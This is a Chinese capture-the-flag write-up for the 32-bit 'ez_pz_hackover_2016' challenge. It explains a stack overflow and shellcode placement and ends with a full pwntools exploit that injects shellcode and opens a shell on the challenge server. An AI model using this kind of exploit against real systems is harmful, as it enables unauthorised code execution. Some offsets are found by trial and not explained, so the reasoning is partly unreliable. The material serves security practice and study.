事前准备
没啥保护 32
进ida看看
第一个函数没啥用,主要是第二个
第二个函数内部vuln有个明显的溢出
漏洞及其利用思路
虽然没开nx,但是也没有写到bss的方法,而这题给了s的位置,也就是实际上栈中的位置,所以我们可以考虑把shellcode打到栈上,然后利用调试算出shellcode地址就能解题了
vuln因为strcmp的原因后跟个\x00
这里主要复现一下地址利用过程
这里打印的是0xffb9f10c
这里直接跳转至vuln memcpy位置
可以看到他的写入位置是
0xffb9f0b6
10ch-0b6h=56h
而这个地址是我们注入数据的首地址,起初我准备用
carshme+shellcode+rubish+ret的形式
但这题可能是因为一些其他的原因,导致这样的排布无法使用(调试中发现ret无法正常覆盖)
所以改成carshme+rubish+ret+shellcode 的形式
所以用又因为栈是由大到小生长的,所以是先减后加
也就是-0x56+0x32(bufsize)+4(rbp)+0x4(retsize)
至于a为什么不是50-8+4的长度,我也不清楚,我是调试发现过长后数出有多的4*7个 0x61去更改的payload
exp:
from pwn import*
from sys import*
p=remote('node4.buuoj.cn',28260 )
#p=process('./ez_pz_hackover_2016',)
#p=gdb.debug('./ez_pz_hackover_2016')
#elf=ELF('./ez_pz_hackover_2016')
context(arch='i386',log_level = 'debug',os = 'linux')
#mainadd=elf.symbols['main']
p.recvuntil("0x")
sadd=int(p.recv(8),16)
print("%x"%sadd)
print("%x"%(sadd-0x1c))#0x56+0x36+0x4
print(-0x56+0x36+0x4)
shellcode=asm(shellcraft.sh())
size=len(shellcode)
print(size)
print(0x32+4-8-size)
#28 is use gdb to find
payload= b'crashme\x00'+b"a"*(0x32-4-28)+p32(sadd-0x1c)+shellcode
p1=payload
p.sendlineafter("Whats your name?\n",p1)
sleep(1)
p.sendline("cat flag")
p.interactive()